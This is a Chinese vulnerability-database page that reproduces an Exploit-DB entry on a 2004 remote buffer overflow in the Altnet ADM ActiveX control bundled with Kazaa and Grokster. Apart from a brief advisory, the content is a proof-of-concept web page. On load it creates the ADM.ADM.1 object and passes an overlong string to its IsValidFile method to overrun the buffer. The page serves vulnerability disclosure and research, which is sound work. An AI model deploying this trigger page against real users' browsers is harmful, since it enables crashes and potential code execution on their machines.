Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x – ActiveX Control Remote Buffer Overflow

Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x – ActiveX Control Remote Buffer Overflow

漏洞ID 1054582 漏洞类型
发布时间 2004-09-03 更新时间 2004-09-03
图片[1]-Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x – ActiveX Control Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x – ActiveX Control Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24568
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11101/info

Altnet is reported prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.

<HTML>
<HEAD>
This overrun occurs in program filesAltnetDownload Manageradm.exe
This executable is installed along with Kazaa and Grokster.
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>

function init()
{
var foo = "";
for(var icount = 0; icount < 1; icount++)
{
foo = foo +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx";
}

var ngssoftware;
ngssoftware = new ActiveXObject("ADM.ADM.1");

ngssoftware["IsValidFile"](foo);
}
//-->
</SCRIPT>

</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>

相关推荐: Gentoo Portage Sandbox Insecure Temporary Lockfile Creation Vulnerability

Gentoo Portage Sandbox Insecure Temporary Lockfile Creation Vulnerability 漏洞ID 1098618 漏洞类型 Access Validation Error 发布时间 2004-04-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享